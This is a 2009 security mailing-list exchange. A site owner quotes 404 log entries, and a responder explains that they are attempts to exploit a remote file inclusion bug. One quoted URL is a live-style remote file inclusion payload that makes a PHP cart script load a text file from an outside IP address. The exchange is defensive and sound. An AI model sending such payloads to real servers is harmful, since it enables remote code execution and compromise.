On Jan 2, 2009, at 4:10 AM, Simon wrote:
> Hi all,
>
> Yesterday evening I had lots of 404-messages from my web server, all
> pointing to locations like
> http://foo.bar/something//ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt
> ?
> I don't use paypal or anything similar on my page; what does that
> mean?
>
Looks like a bug being exploited with file inclusion being rendered
back to your server.
I would look for other signs of compromise on your system as well as
what Tom Ritter posted.
| Daniel Uriah Clemens
| Packetninjas L.L.C | | http://www.packetninjas.net
| c. 205.567.6850 | | o. 866.267.8851
"The secret to creativity is knowing how to hide your sources" Einstein
-------------------------------------------------------------------------
Sponsored by: Watchfire
Methodologies & Tools for Web Application Security Assessment
With the rapid rise in the number and types of security threats, web application security assessments should be considered a crucial phase in the development of any web application. What methodology should be followed? What tools can accelerate the assessment process? Download this Whitepaper today!
https://www.watchfire.com/securearea/whitepapers.aspx?id=70170000000940F
-------------------------------------------------------------------------
Received on Jan 04 2009
Intro
